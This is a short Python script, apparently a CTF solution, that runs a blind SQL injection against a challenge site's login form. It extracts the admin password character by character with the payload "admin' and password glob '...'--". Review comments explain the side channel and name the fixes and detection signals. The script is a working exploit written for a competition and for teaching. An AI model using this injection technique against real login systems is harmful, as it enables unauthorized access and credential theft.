
@m--- /login_as_admin.py Secret
Created Sep 8, 2015

# coding: utf8
import sys
import urllib
import urllib2
import string
def blind(sql):
    """Submit one login attempt and report whether the reply body is empty.

    ``sql`` is sent as the ``username`` form field; ``password`` is the
    fixed string ``'a'``. The return value is True only when the response
    body is exactly the empty string, which the caller treats as "the
    injected condition held".

    NOTE(review): presumably the CGI builds its query by concatenating the
    username into the SQL text; the server code is not shown here. That
    one-bit difference in the response is the whole side channel. A
    parameterized query on the server removes it, and answering failed
    and odd logins identically would hide it.
    """
    form = urllib.urlencode({'username': sql, 'password': 'a'})
    # Passing a data argument makes urllib2 issue a POST.
    req = urllib2.Request('http://arrive.chal.mmactf.link/login.cgi', form)
    body = urllib2.build_opener().open(req).read()
    return body == ''
if __name__ == '__main__':
    # Username template: closes the quoted value, adds a prefix test on the
    # password column, and comments out the rest of the statement.
    # NOTE(review): `glob` points at a SQLite backend (inferred from the
    # operator, not shown on the page); GLOB is case-sensitive, so the
    # prefix test distinguishes upper- and lower-case letters.
    template = "admin' and password glob '%s*'--"
    alphabet = '_{}!' + string.ascii_letters + string.digits
    known = 'MMA{'
    # Each round extends the known prefix by one character and costs up to
    # len(alphabet) login requests. On the server side this appears as a
    # burst of logins for one account whose username field carries quote
    # and comment characters, which is a usable detection signal.
    while True:
        for ch in alphabet:
            candidate = known + ch
            if blind(template % candidate):
                print 'find: ' + candidate
                known = candidate
                break
            # NOTE(review): the page lost its indentation; this progress
            # print is placed inside the for loop (one line per rejected
            # candidate). Confirm against the original file.
            print candidate
        else:
            # No character extended the prefix, so the value is complete.
            break
    print known